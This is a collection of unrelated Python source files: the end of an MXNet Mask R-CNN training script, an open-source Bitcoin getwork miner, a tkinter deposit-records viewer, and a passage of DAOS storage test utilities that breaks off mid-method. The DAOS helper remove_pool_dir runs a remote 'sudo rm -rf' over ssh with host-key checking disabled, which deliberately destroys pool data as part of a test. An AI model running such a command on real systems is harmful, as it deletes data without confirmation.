range(len(metric_losses)): metric_losses[k].append(result[k]) for k in range(len(add_losses)): add_losses[k].append(result[len(metric_losses) + k]) try: # prefetch next batch next_data_batch = next(train_data_iter) next_data_batch = split_and_load(next_data_batch, ctx_list=ctx) except StopIteration: pass trainer.step(batch_size) for metric, record in zip(metrics, metric_losses): metric.update(0, record) for metric, records in zip(metrics2, add_losses): for pred in records: metric.update(pred[0], pred[1]) if (not args.horovod or hvd.rank() == 0) and args.log_interval \ and not (i + 1) % args.log_interval: msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in metrics + metrics2]) batch_speed = args.log_interval * args.batch_size / (time.time() - btic) speed.append(batch_speed) logger.info('[Epoch {}][Batch {}], Speed: {:.3f} samples/sec, {}'.format( epoch, i, batch_speed, msg)) btic = time.time() if speed: avg_batch_speed = sum(speed) / len(speed) # validate and save params if (not args.horovod) or hvd.rank() == 0: msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in metrics]) logger.info('[Epoch {}] Training cost: {:.3f}, Speed: {:.3f} samples/sec, {}'.format( epoch, (time.time() - tic), avg_batch_speed, msg)) if not (epoch + 1) % args.val_interval: # consider reduce the frequency of validation to save time validate(net, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map, args) elif (not args.horovod) or hvd.rank() == 0: current_map = 0. save_params(net, logger, best_map, current_map, epoch, args.save_interval, args.save_prefix) for thread in async_eval_processes: thread.join() if __name__ == '__main__': args = parse_args() # fix seed for mxnet, numpy and python builtin random generator. 
gutils.random.seed(args.seed) if args.amp: amp.init() # training contexts if args.horovod: ctx = [mx.gpu(hvd.local_rank())] else: ctx = [mx.gpu(int(i)) for i in args.gpus.split(',') if i.strip()] ctx = ctx if ctx else [mx.cpu()] # network kwargs = {} module_list = [] if args.use_fpn: module_list.append('fpn') if args.norm_layer is not None: module_list.append(args.norm_layer) if args.norm_layer == 'bn': kwargs['num_devices'] = len(ctx) num_gpus = hvd.size() if args.horovod else len(ctx) net_name = '_'.join(('mask_rcnn', *module_list, args.network, args.dataset)) if args.custom_model: args.use_fpn = True net_name = '_'.join(('mask_rcnn_fpn', args.network, args.dataset)) if args.norm_layer == 'bn': norm_layer = gluon.contrib.nn.SyncBatchNorm norm_kwargs = {'num_devices': len(ctx)} sym_norm_layer = mx.sym.contrib.SyncBatchNorm sym_norm_kwargs = {'ndev': len(ctx)} elif args.norm_layer == 'gn': norm_layer = gluon.nn.GroupNorm norm_kwargs = {'groups': 8} sym_norm_layer = mx.sym.GroupNorm sym_norm_kwargs = {'groups': 8} else: norm_layer = gluon.nn.BatchNorm norm_kwargs = None sym_norm_layer = None sym_norm_kwargs = None if args.dataset == 'coco': classes = COCODetection.CLASSES else: # default to VOC classes = VOCDetection.CLASSES net = get_model('custom_mask_rcnn_fpn', classes=classes, transfer=None, dataset=args.dataset, pretrained_base=not args.no_pretrained_base, base_network_name=args.network, norm_layer=norm_layer, norm_kwargs=norm_kwargs, sym_norm_kwargs=sym_norm_kwargs, num_fpn_filters=args.num_fpn_filters, num_box_head_conv=args.num_box_head_conv, num_box_head_conv_filters=args.num_box_head_conv_filters, num_box_head_dense_filters=args.num_box_head_dense_filters, short=args.image_short, max_size=args.image_max_size, min_stage=2, max_stage=6, nms_thresh=args.nms_thresh, nms_topk=args.nms_topk, post_nms=args.post_nms, roi_mode=args.roi_mode, roi_size=args.roi_size, strides=args.strides, clip=args.clip, rpn_channel=args.rpn_channel, base_size=args.anchor_base_size, 
scales=args.anchor_scales, ratios=args.anchor_aspect_ratio, alloc_size=args.anchor_alloc_size, rpn_nms_thresh=args.rpn_nms_thresh, rpn_train_pre_nms=args.rpn_train_pre_nms, rpn_train_post_nms=args.rpn_train_post_nms, rpn_test_pre_nms=args.rpn_test_pre_nms, rpn_test_post_nms=args.rpn_test_post_nms, rpn_min_size=args.rpn_min_size, per_device_batch_size=args.batch_size // num_gpus, num_sample=args.rcnn_num_samples, pos_iou_thresh=args.rcnn_pos_iou_thresh, pos_ratio=args.rcnn_pos_ratio, max_num_gt=args.max_num_gt, target_roi_scale=args.target_roi_scale, num_fcn_convs=args.num_mask_head_convs) else: net = get_model(net_name, pretrained_base=True, per_device_batch_size=args.batch_size // num_gpus, **kwargs) args.save_prefix += net_name if args.resume.strip(): net.load_parameters(args.resume.strip()) else: for param in net.collect_params().values(): if param._data is not None: continue param.initialize() net.collect_params().reset_ctx(ctx) if args.amp: # Cast both weights and gradients to 'float16' net.cast('float16') # This layers doesn't support type 'float16' net.collect_params('.*batchnorm.*').setattr('dtype', 'float32') net.collect_params('.*normalizedperclassboxcenterencoder.*').setattr('dtype', 'float32') # set up logger logging.basicConfig() logger = logging.getLogger() logger.setLevel(logging.INFO) log_file_path = args.save_prefix + '_train.log' log_dir = os.path.dirname(log_file_path) if log_dir and not os.path.exists(log_dir): os.makedirs(log_dir) fh = logging.FileHandler(log_file_path) logger.addHandler(fh) if MPI is None and args.horovod: logger.warning('mpi4py is not installed, validation result may be incorrect.') # training data train_dataset, val_dataset, eval_metric = get_dataset(args.dataset, args) batch_size = args.batch_size // num_gpus if args.horovod else args.batch_size train_data, val_data = get_dataloader( net, train_dataset, val_dataset, MaskRCNNDefaultTrainTransform, MaskRCNNDefaultValTransform, batch_size, len(ctx), args) # training train(net, 
train_data, val_data, eval_metric, batch_size, ctx, logger, args)
pyminer.py
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# NOTE: this file is Python 2 (print statements, httplib, long literals).

import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process

ERR_SLEEP = 15		# seconds to back off after an RPC failure
MAX_NONCE = 1000000L	# nonces scanned per work unit

settings = {}
pp = pprint.PrettyPrinter(indent=4)

class BitcoinRPC:
	"""Minimal JSON-RPC 1.1 client for a bitcoind node over HTTP basic auth."""
	OBJID = 1

	def __init__(self, host, port, username, password):
		authpair = "%s:%s" % (username, password)
		self.authhdr = "Basic %s" % (base64.b64encode(authpair))
		self.conn = httplib.HTTPConnection(host, port, False, 30)
	def rpc(self, method, params=None):
		"""POST one JSON-RPC call; returns the 'result' field, the error
		object on RPC error, or None on transport/decode failure."""
		# First increment copies the class-level OBJID into the instance.
		self.OBJID += 1
		obj = { 'version' : '1.1',
			'method' : method,
			'id' : self.OBJID }
		if params is None:
			obj['params'] = []
		else:
			obj['params'] = params
		self.conn.request('POST', '/', json.dumps(obj),
			{ 'Authorization' : self.authhdr,
			  'Content-type' : 'application/json' })
		resp = self.conn.getresponse()
		if resp is None:
			print "JSON-RPC: no response"
			return None
		body = resp.read()
		resp_obj = json.loads(body)
		if resp_obj is None:
			print "JSON-RPC: cannot JSON-decode body"
			return None
		if 'error' in resp_obj and resp_obj['error'] != None:
			return resp_obj['error']
		if 'result' not in resp_obj:
			print "JSON-RPC: no result in object"
			return None
		return resp_obj['result']
	def getblockcount(self):
		return self.rpc('getblockcount')
	def getwork(self, data=None):
		return self.rpc('getwork', data)

def uint32(x):
	# Truncate to an unsigned 32-bit value.
	return x & 0xffffffffL

def bytereverse(x):
	# Reverse the byte order of a 32-bit word.
	return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
			(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))

def bufreverse(in_buf):
	# Byte-swap each 32-bit word of a buffer in place (word order kept).
	out_words = []
	for i in range(0, len(in_buf), 4):
		word = struct.unpack('@I', in_buf[i:i+4])[0]
		out_words.append(struct.pack('@I', bytereverse(word)))
	return ''.join(out_words)

def wordreverse(in_buf):
	# Reverse the order of the 32-bit words of a buffer (bytes within words kept).
	out_words = []
	for i in range(0, len(in_buf), 4):
		out_words.append(in_buf[i:i+4])
	out_words.reverse()
	return ''.join(out_words)

class Miner:
	"""Scans nonces for one getwork unit and submits winning solutions."""
	def __init__(self, id):
		self.id = id
		self.max_nonce = MAX_NONCE

	def work(self, datastr, targetstr):
		"""Scan up to max_nonce nonces over the given block header.

		datastr: hex-encoded 80-byte block header from getwork.
		targetstr: hex-encoded 256-bit target.
		Returns (hashes_done, nonce_bin) with nonce_bin None when no
		solution was found in this scan window.
		"""
		# decode work data hex string to binary
		static_data = datastr.decode('hex')
		static_data = bufreverse(static_data)

		# the first 76b of 80b do not change
		blk_hdr = static_data[:76]

		# decode 256-bit target value
		targetbin = targetstr.decode('hex')
		targetbin = targetbin[::-1]	# byte-swap and dword-swap
		targetbin_str = targetbin.encode('hex')
		target = long(targetbin_str, 16)

		# pre-hash first 76b of block header
		static_hash = hashlib.sha256()
		static_hash.update(blk_hdr)

		for nonce in xrange(self.max_nonce):

			# encode 32-bit nonce value
			nonce_bin = struct.pack("<I", nonce)

			# hash final 4b, the nonce value
			hash1_o = static_hash.copy()
			hash1_o.update(nonce_bin)
			hash1 = hash1_o.digest()

			# sha256 hash of sha256 hash
			hash_o = hashlib.sha256()
			hash_o.update(hash1)
			hash = hash_o.digest()

			# quick test for winning solution: high 32 bits zero?
			if hash[-4:] != '\0\0\0\0':
				continue

			# convert binary hash to 256-bit Python long
			hash = bufreverse(hash)
			hash = wordreverse(hash)

			hash_str = hash.encode('hex')
			l = long(hash_str, 16)

			# proof-of-work test:  hash < target
			if l < target:
				print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
				return (nonce + 1, nonce_bin)
			else:
				print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
#				return (nonce + 1, nonce_bin)

		return (nonce + 1, None)

	def submit_work(self, rpc, original_data, nonce_bin):
		"""Splice the winning nonce back into the getwork data and submit it."""
		nonce_bin = bufreverse(nonce_bin)
		nonce = nonce_bin.encode('hex')
		# nonce occupies hex chars [152:160) of the 256-char data field
		solution = original_data[:152] + nonce + original_data[160:256]
		param_arr = [ solution ]
		result = rpc.getwork(param_arr)
		print time.asctime(), "--> Upstream RPC result:", result

	def iterate(self, rpc):
		"""One fetch-scan cycle: get work, mine it, and report hash rate."""
		work = rpc.getwork()
		if work is None:
			time.sleep(ERR_SLEEP)
			return
		if 'data' not in work or 'target' not in work:
			time.sleep(ERR_SLEEP)
			return

		time_start = time.time()

		(hashes_done, nonce_bin) = self.work(work['data'], work['target'])

		time_end = time.time()
time_diff = time_end - time_start self.max_nonce = long( (hashes_done * settings['scantime']) / time_diff) if self.max_nonce > 0xfffffffaL: self.max_nonce = 0xfffffffaL if settings['hashmeter']: print "HashMeter(%d): %d hashes, %.2f Khash/sec" % ( self.id, hashes_done, (hashes_done / 1000.0) / time_diff) if nonce_bin is not None: self.submit_work(rpc, work['data'], nonce_bin) def loop(self): rpc = BitcoinRPC(settings['host'], settings['port'], settings['rpcuser'], settings['rpcpass']) if rpc is None: return while True: self.iterate(rpc) def miner_thread(id): miner = Miner(id) miner.loop() if __name__ == '__main__': if len(sys.argv) != 2: print "Usage: pyminer.py CONFIG-FILE" sys.exit(1) f = open(sys.argv[1]) for line in f: # skip comment lines m = re.search('^\s*#', line) if m: continue # parse key=value lines m = re.search('^(\w+)\s*=\s*(\S.*)$', line) if m is None: continue settings[m.group(1)] = m.group(2) f.close() if 'host' not in settings: settings['host'] = '127.0.0.1' if 'port' not in settings: settings['port'] = 29377 if 'threads' not in settings: settings['threads'] = 1 if 'hashmeter' not in settings: settings['hashmeter'] = 0 if 'scantime' not in settings: settings['scantime'] = 30L if 'rpcuser' not in settings or 'rpcpass' not in settings: print "Missing username and/or password in cfg file" sys.exit(1) settings['port'] = int(settings['port']) settings['threads'] = int(settings['threads']) settings['hashmeter'] = int(settings['hashmeter']) settings['scantime'] = long(settings['scantime']) thr_list = [] for thr_id in range(settings['threads']): p = Process(target=miner_thread, args=(thr_id,)) p.start() thr_list.append(p) time.sleep(1) # stagger threads print settings['threads'], "mining threads started" print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port']) try: for thr_proc in thr_list: thr_proc.join() except KeyboardInterrupt: pass print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
Records.py
# This folder contains program to access the records of fee depositors

# Importing necessary libraries
print('Importing necessary libraries for deposit records...')
import time
import threading
from Classes import *
from tkinter import ttk
from tkinter import *
import pandas as pd
from pandastable import Table

# Master dataframe of all deposits, read once at import time.
# NOTE(review): assumes Deposit_Records.xlsx exists in the working
# directory and has 'Class' and 'Name' columns -- confirm with callers.
table = pd.read_excel('Deposit_Records.xlsx')


def imports():
    """Import the heavyweight optional libraries on a background thread.

    Publishes the imported names as module globals so the GUI can start
    without blocking on matplotlib/pywhatkit import time.
    """
    global Calendar, DateEntry, datetime, pd, plt, string, os, pywhatkit
    from tkcalendar import Calendar, DateEntry
    print('Calendar, DateEntry imported')
    from datetime import datetime
    print('Datetime imported')
    import pandas as pd
    print('Pandas imported')
    import matplotlib.pyplot as plt
    print('Matplotlib imported')
    import string
    print('String imported')
    import os
    print('OS imported')
    import pywhatkit
    print('Pywhatkit imported')


# Kick off the background imports as soon as this module loads.
threading.Thread(target=imports).start()


def deposit_records():
    """Open the Tk window that lets the user browse deposit records."""
    # Preparing window...
    print('Preparing deposit records accessor window...')
    depo_rec = Tk()
    # 'window' comes from the star import of Classes -- presumably a GUI
    # helper wrapper; TODO confirm its API against Classes.py.
    depo_rec_gui = window(depo_rec, 'Deposit Records')
    depo_rec_lf1 = LabelFrame(depo_rec, text='Records', relief='groove', bd=10)
    depo_rec_lf1.grid(row=1, column=0, columnspan=2, padx=10, pady=10)

    # Making labels and boxes for type of record user wants to access
    depo_rec_l1 = Label(depo_rec_lf1)
    depo_rec_l1_gui = window.label(
        depo_rec_l1, 'Please select whose records you want to access: ', 0, 0)
    classes = [str(i) for i in list(table.Class.unique())]
    names = list(table.Name.unique())
    names.sort()
    options = ['All History']+classes+names  # Contains list of all names and classes
    variable = StringVar()
    depo_rec_combobox1 = ttk.Combobox(depo_rec_lf1, textvariable=variable)
    depo_rec_combobox1_gui = window.combobox(depo_rec_combobox1, options, 0, 1)

    # Program for submit button
    def depo_rec_b1_func():
        # Render the table filtered by the combobox selection: a class,
        # a single depositor's name, or the full history (else branch).
        f1 = Frame(depo_rec, relief='groove', bd=10)
        f1.grid(row=2, column=0, columnspan=3, padx=10, pady=10)
        if depo_rec_combobox1.get() in classes:
            # Class labels were stringified above; convert back to int
            # where possible so the dataframe comparison matches dtype.
            try:
                real_class = int(depo_rec_combobox1.get())
            except Exception:
                real_class = depo_rec_combobox1.get()
            tb = Table(f1, dataframe=table[table['Class'] == real_class],
                       showtoolbar=True, showstatusbar=True)
            tb.show()
        elif depo_rec_combobox1.get() in names:
            tb = Table(f1, dataframe=table.loc[table['Name'] == depo_rec_combobox1.get(
            )], showtoolbar=True, showstatusbar=True)
            tb.show()
        else:
            tb = Table(f1, dataframe=table, showtoolbar=True,
                       showstatusbar=True)
            tb.show()

    depo_rec_b1 = ttk.Button(depo_rec, text='Submit', command=depo_rec_b1_func)
    depo_rec_b1.grid(row=1, column=2, padx=5, pady=5)
    depo_rec.mainloop()
osa_utils.py
#!/usr/bin/python3
"""
(C) Copyright 2020-2021 Intel Corporation.

SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import ctypes
import queue
import time
import threading
import re
from avocado import fail_on
from ior_test_base import IorTestBase
from mdtest_test_base import MdtestBase
from command_utils import CommandFailure
from pydaos.raw import (DaosContainer, IORequest,
                        DaosObj, DaosApiError)
from general_utils import create_string_buffer, run_command


class OSAUtils(MdtestBase, IorTestBase):
    # pylint: disable=too-many-ancestors
    """
    Test Class Description: This test runs
    daos_server offline drain test cases.

    :avocado: recursive
    """

    def setUp(self):
        """Set up for test case.

        Reads the dkey/akey/record parameters and IOR flags from the test
        yaml and initializes the per-test state used by the helpers below.
        """
        super().setUp()
        self.pool_cont_dict = {}          # pool -> [contA, flag, contB, flag]
        self.container = None
        self.obj = None
        self.ioreq = None
        self.dmg_command = self.get_dmg_command()
        self.no_of_dkeys = self.params.get("no_of_dkeys", '/run/dkeys/*',
                                           default=[0])[0]
        self.no_of_akeys = self.params.get("no_of_akeys", '/run/akeys/*',
                                           default=[0])[0]
        self.record_length = self.params.get("length", '/run/record/*',
                                             default=[0])[0]
        self.ior_w_flags = self.params.get("write_flags",
                                           '/run/ior/iorflags/*',
                                           default="")
        self.ior_r_flags = self.params.get("read_flags",
                                           '/run/ior/iorflags/*')
        self.server_count = len(self.hostlist_servers)
        self.engine_count = self.server_managers[0].get_config_value(
            "engines_per_host")
        self.out_queue = queue.Queue()
        # dmg failures are inspected by the callers rather than raised.
        self.dmg_command.exit_status_exception = False
        self.test_during_aggregation = False
        self.test_during_rebuild = False
        self.test_with_checksum = True
        # By default, test_with_rf is set to False.
        # It is up to individual test to enable it.
        self.test_with_rf = False
        self.test_with_blank_node = False
        self.test_with_snapshot = False

    @fail_on(CommandFailure)
    def get_pool_leader(self):
        """Get the pool leader.

        Returns:
            int: pool leader value
        """
        data = self.dmg_command.pool_query(self.pool.uuid)
        return int(data["response"]["leader"])

    @fail_on(CommandFailure)
    def get_rebuild_status(self):
        """Get the rebuild status.

        Returns:
            str: rebuild status
        """
        data = self.dmg_command.pool_query(self.pool.uuid)
        return data["response"]["rebuild"]["status"]

    @fail_on(CommandFailure)
    def get_rebuild_state(self):
        """Get the rebuild state.

        Returns:
            str: rebuild state
        """
        data = self.dmg_command.pool_query(self.pool.uuid)
        return data["response"]["rebuild"]["state"]

    @fail_on(CommandFailure)
    def is_rebuild_done(self, time_interval,
                        wait_for_rebuild_to_complete=False):
        """Wait (polling) until rebuild is completed/done.

        Args:
            time_interval: Wait interval between checks
            wait_for_rebuild_to_complete: Rebuild completed
                                          (Default: False)
        """
        self.pool.wait_for_rebuild(wait_for_rebuild_to_complete,
                                   interval=time_interval)

    @fail_on(CommandFailure)
    def assert_on_rebuild_failure(self):
        """If the rebuild is not successful, raise assert."""
        rebuild_status = self.get_rebuild_status()
        self.log.info("Rebuild Status: %s", rebuild_status)
        # Any of these states at this point means rebuild did not finish.
        rebuild_failed_string = ["failed", "scanning", "aborted", "busy"]
        self.assertTrue(rebuild_status not in rebuild_failed_string,
                        "Rebuild failed")

    @fail_on(CommandFailure)
    def print_and_assert_on_rebuild_failure(self, out, timeout=3):
        """Print the out value (daos, dmg, etc) and check for
        rebuild completion. If not, raise assert.
        """
        self.log.info(out)
        self.is_rebuild_done(timeout)
        self.assert_on_rebuild_failure()

    @fail_on(CommandFailure)
    def get_pool_version(self):
        """Get the pool version.

        Returns:
            int: pool_version_value
        """
        data = self.dmg_command.pool_query(self.pool.uuid)
        return int(data["response"]["version"])

    @fail_on(CommandFailure)
    def get_ipaddr_for_rank(self, rank=None):
        """Obtain the IPAddress and port number for a particular
        server rank.

        Args:
            rank (int): daos_engine rank. Defaults to None.

        Returns:
            ip_addr (str) : IPAddress for the rank.
            port_num (str) : Port number for the rank.
        """
        output = self.dmg_command.system_query()
        members_length = self.server_count * self.engine_count
        for i in range(0, members_length):
            if rank == int(output["response"]["members"][i]["rank"]):
                temp = output["response"]["members"][i]["addr"]
                ip_addr = temp.split(":")
                temp = output["response"]["members"][i]["fabric_uri"]
                # fabric_uri looks like proto://addr:port; index 2 is
                # the port component after splitting on ':'.
                port_num = temp.split(":")
                return ip_addr[0], port_num[2]
        # Rank not found among the queried members.
        return None, None

    @fail_on(CommandFailure)
    def remove_pool_dir(self, ip_addr=None, port_num=None):
        """Remove the /mnt/daos[x]/<pool_uuid>/vos-* directory

        Args:
            ip_addr (str): IP address of the daos server.
                           Defaults to None.
            port_number (str) : Port number the daos server.
        """
        # Create the expected port list
        # expected_ports = [port0] - Single engine/server
        # expected_ports = [port0, port1] - Two engine/server
        expected_ports = [engine_param.get_value("fabric_iface_port")
                          for engine_param in self.server_managers[-1].
                          manager.job.yaml.engine_params]
        self.log.info("Expected ports : %s", expected_ports)
        if ip_addr is None or port_num is None:
            self.log.info("ip_addr : %s port_number: %s",
                          ip_addr, port_num)
            self.fail("No IP Address or Port number provided")
        else:
            if self.engine_count == 1:
                self.log.info("Single Engine per Server")
                cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
                      sudo rm -rf /mnt/daos/{}/vos-*". \
                    format(ip_addr, self.pool.uuid)
            elif self.engine_count == 2:
                # Map the fabric port back to the mount index (daos0/daos1).
                if port_num == str(expected_ports[0]):
                    port_val = 0
                elif port_num == str(expected_ports[1]):
                    port_val = 1
                else:
                    self.log.info("port_number: %s", port_num)
                    self.fail("Invalid port number")
                cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
                      sudo rm -rf /mnt/daos{}/{}/vos-*". \
                    format(ip_addr, port_val, self.pool.uuid)
            else:
                self.fail("Not supported engine per server configuration")
            run_command(cmd)

    def set_container(self, container):
        """Set the OSA utils container object.

        Args:
            container (obj) : Container object to be used
                              within OSA utils.
        """
        self.container = container

    def simple_osa_reintegrate_loop(self, rank, action="exclude",
                                    loop_time=100):
        """This method performs exclude or drain and
        reintegration on a rank for a certain amount of time.

        Args:
            rank (int): daos server rank.
            action (str) : "exclude" or "drain".
                           Defaults to "exclude"
            loop_time: Total time to perform drain/reintegrate
                       operation in a loop. (Default : 100 secs)
        """
        start_time = 0
        finish_time = 0
        start_time = time.time()
        while int(finish_time - start_time) < loop_time:
            if action == "exclude":
                output = self.dmg_command.pool_exclude(
                    self.pool.uuid, rank)
            else:
                output = self.dmg_command.pool_drain(
                    self.pool.uuid, rank)
            self.print_and_assert_on_rebuild_failure(output)
            output = self.dmg_command.pool_reintegrate(
                self.pool.uuid, rank)
            self.print_and_assert_on_rebuild_failure(output)
            finish_time = time.time()

    @fail_on(DaosApiError)
    def write_single_object(self):
        """Write some data to the existing pool.

        Creates a container (with checksum per yaml), one object of
        class 1, and inserts no_of_dkeys x no_of_akeys single values.
        """
        self.pool.connect(2)
        csum = self.params.get("enable_checksum", '/run/container/*')
        self.container = DaosContainer(self.context)
        input_param = self.container.cont_input_values
        input_param.enable_chksum = csum
        self.container.create(poh=self.pool.pool.handle,
                              con_prop=input_param)
        self.container.open()
        self.obj = DaosObj(self.context, self.container)
        self.obj.create(objcls=1)
        self.obj.open()
        self.ioreq = IORequest(self.context,
                               self.container,
                               self.obj, objtype=4)
        self.log.info("Writing the Single Dataset")
        for dkey in range(self.no_of_dkeys):
            for akey in range(self.no_of_akeys):
                # Record payload is the first char of the akey index,
                # repeated record_length times (easy to verify later).
                indata = ("{0}".format(str(akey)[0])
                          * self.record_length)
                d_key_value = "dkey {0}".format(dkey)
                c_dkey = create_string_buffer(d_key_value)
                a_key_value = "akey {0}".format(akey)
                c_akey = create_string_buffer(a_key_value)
                c_value = create_string_buffer(indata)
                c_size = ctypes.c_size_t(ctypes.sizeof(c_value))
                self.ioreq.single_insert(c_dkey, c_akey,
                                         c_value, c_size)
        self.obj.close()
        self.container.close()

    @fail_on(DaosApiError)
    def verify_single_object(self):
        """Verify the container data on the existing pool.

        Re-reads every dkey/akey written by write_single_object and
        fails the test on any mismatch.
        """
        self.pool.connect(2)
        self.container.open()
        self.obj.open()
        self.log.info("Single Dataset Verification -- Started")
        for dkey in range(self.no_of_dkeys):
            for akey in range(self.no_of_akeys):
                indata = ("{0}".format(str(akey)[0])
                          * self.record_length)
                c_dkey = create_string_buffer("dkey {0}".format(dkey))
                c_akey = create_string_buffer("akey {0}".format(akey))
                val = self.ioreq.single_fetch(c_dkey, c_akey,
                                              len(indata)+1)
                if indata != (repr(val.value)[1:-1]):
                    self.d_log.error("ERROR:Data mismatch for "
                                     "dkey = {0}, "
                                     "akey = {1}".format(
                                         "dkey {0}".format(dkey),
                                         "akey {0}".format(akey)))
                    self.fail(
                        "ERROR: Data mismatch for dkey = {0}, akey={1}"
                        .format("dkey {0}".format(dkey),
                                "akey {0}".format(akey)))
        self.obj.close()
        self.container.close()

    def prepare_cont_ior_write_read(self, oclass, flags):
        """This method prepares the containers for
        IOR write and read invocations.

        To enable aggregation:
        - Create two containers and read always from first container
        Normal usage (use only a single container):
        - Create a single container and use the same.

        Args:
            oclass (str): IOR object class
            flags (str): IOR flags
        """
        self.log.info(self.pool_cont_dict)
        # If pool is not in the dictionary,
        # initialize its container list to None
        # {poolA : [None, None], [None, None]}
        if self.pool not in self.pool_cont_dict:
            self.pool_cont_dict[self.pool] = [None] * 4
        # Create container if the pool doesn't have one.
        # Otherwise, use the existing container in the pool.
        # pool_cont_dict {pool A: [containerA, Updated,
        #                          containerB, Updated],
        #                 pool B : containerA, Updated,
        #                          containerB, None]}
        if self.pool_cont_dict[self.pool][0] is None:
            self.add_container(self.pool, create=False)
            self.set_cont_class_properties(oclass)
            if self.test_with_checksum is False:
                # Without checksum, reduce the redundancy factor by one.
                tmp = self.get_object_replica_value(oclass)
                rf_value = "rf:{}".format(tmp - 1)
                self.update_cont_properties(rf_value)
            self.container.create()
            self.pool_cont_dict[self.pool][0] = self.container
            self.pool_cont_dict[self.pool][1] = "Updated"
        else:
            if ((self.test_during_aggregation is True) and
                    (self.pool_cont_dict[self.pool][1] == "Updated") and
                    (self.pool_cont_dict[self.pool][3] is None) and
                    ("-w" in flags)):
                # Write to the second container
                self.add_container(self.pool, create=False)
                self.set_cont_class_properties(oclass)
                if self.test_with_checksum is False:
                    tmp = self.get_object_replica_value(oclass)
                    rf_value = "rf:{}".format(tmp - 1)
                    self.update_cont_properties(rf_value)
                self.container.create()
                self.pool_cont_dict[self.pool][2] = self.container
                self.pool_cont_dict[self.pool][3] = "Updated"
            else:
                self.container = self.pool_cont_dict[self.pool][0]

    def delete_extra_container(self, pool):
        """Delete the extra container in the pool.
        Refer prepare_cont_ior_write_read. This method should be
        called when OSA tests intend to enable aggregation.

        Args:
            pool (object): pool handle
        """
        # NOTE(review): sets the property on self.pool rather than the
        # 'pool' parameter -- only equivalent when they are the same
        # object; confirm intent with callers.
        self.pool.set_property("reclaim", "time")
        extra_container = self.pool_cont_dict[pool][2]
        extra_container.destroy()
        self.pool_cont_dict[pool][3] = None

    def get_object_replica_value(self, oclass):
        """ Get the object replica value for an object class.

        Args:
            oclass (str): Object Class (eg: RP_2G1,etc)

        Returns:
            value (int) : Object replica value
        """
        value = 0
        if "_" in oclass:
            # e.g. "RP_2G1" -> replica count is the digit after '_'.
            replica_list = oclass.split("_")
            value = replica_list[1][0]
        else:
            self.log.info("Wrong Object Class. Cannot split")
        return int(value)

    def update_cont_properties(self, cont_prop):
        """Update the existing container properties.

        Args:
            cont_prop (str): Replace existing container properties
                             with new value
        """
        self.container.properties.value = cont_prop

    def set_cont_class_properties(self, oclass="S1"):
        """Update the container class to match the IOR/Mdtest
        object class. Fix the rf factor based on object replica value.
        Also, remove the redundancy factor for S type
        object class.

        Args:
            oclass (str, optional): Container object class to be set.
                                    Defaults to "S1".
        """
        self.container.oclass.value = oclass
        # Set the container properties properly for S!, S2 class.
        # rf should not be set to 1 for S type object class.
        x = re.search("^S\\d$", oclass)
        prop = self.container.properties.value
        if x is not None:
            prop = prop.replace("rf:1", "rf:0")
        else:
            tmp = self.get_object_replica_value(oclass)
            rf_value = "rf:{}".format(tmp - 1)
            prop = prop.replace("rf:1", rf_value)
        self.container.properties.value = prop
        # Over-write oclass settings if using redundancy factor
        # and self.test_with_rf is True.
        # This has to be done so that container created doesn't
        # use the object class.
        if self.test_with_rf is True and \
           "rf" in self.container.properties.value:
            self.log.info(
                "Detected container redundancy factor: %s",
                self.container.properties.value)
            self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
            self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
            self.container.oclass.update(None)

    def assert_on_exception(self, out_queue=None):
        """Assert on exception while executing an application.

        Args:
            out_queue (queue): Check whether the queue is
            empty. If empty, app (ior, mdtest) didn't encounter error.
        """
        if out_queue is None:
            out_queue = self.out_queue
        if out_queue.empty():
            pass
        else:
            # Peek the failure, put it back for later inspection, raise.
            exc = out_queue.get(block=False)
            out_queue.put(exc)
            raise CommandFailure(exc)

    def cleanup_queue(self, out_queue=None):
        """Cleanup the existing thread queue.

        Args:
            out_queue (queue): Queue to cleanup.
        """
        if out_queue is None:
            out_queue = self.out_queue
        while not out_queue.empty():
            out_queue.get(block=True)

    def run_ior_thread(self, action, oclass, test,
                       single_cont_read=True,
                       fail_on_warning=True,
                       pool=None):
        """Start the IOR thread for either writing or
        reading data to/from a container.

        Args:
            action (str): Start the IOR thread with Read or
                          Write
            oclass (str): IOR object class
            test (list): IOR test sequence
            single_cont_read (bool) : Always read from the
                                      1st container.
                                      Defaults to True.
            fail_on_warning (bool)  : Test terminates
                                      for IOR warnings.
                                      Defaults to True.
            pool (TestPool): Pool to run ior on. Defaults to None.
        """
        # Intermediate (between correct and hack) implementation for
        # allowing a pool to be passed in. Needs to be fixed by making
        # the pool argument required.
        if pool is None:
            pool = self.pool
        self.cleanup_queue()
        if action == "Write":
            flags = self.ior_w_flags
        else:
            flags = self.ior_r_flags

        # Add a thread for these IOR arguments
        process = threading.Thread(target=self.ior_thread,
                                   kwargs={"pool": pool,
                                           "oclass": oclass,
                                           "test": test,
                                           "flags": flags,
                                           "single_cont_read":
                                           single_cont_read,
                                           "fail_on_warning":
                                           fail_on_warning})
        # Launch the IOR thread
        process.start()
        # Wait for the thread to finish
        process.join()
        if not self.out_queue.empty():
            self.assert_on_exception()

    def ior_thread(self, pool, oclass, test, flags,
                   single_cont_read=True,
                   fail_on_warning=True):
        """Start an IOR thread.

        Args:
            pool (object): pool handle
            oclass (str): IOR object class, container class.
            test (list): IOR test sequence
            flags (str): IOR flags
            single_cont_read (bool) : Always read from the
                                      1st container.
                                      Defaults to True.
            fail_on_warning (bool)  : Test terminates
                                      for IOR warnings.
                                      Defaults to True.
        """
        self.cleanup_queue()
        self.pool = pool
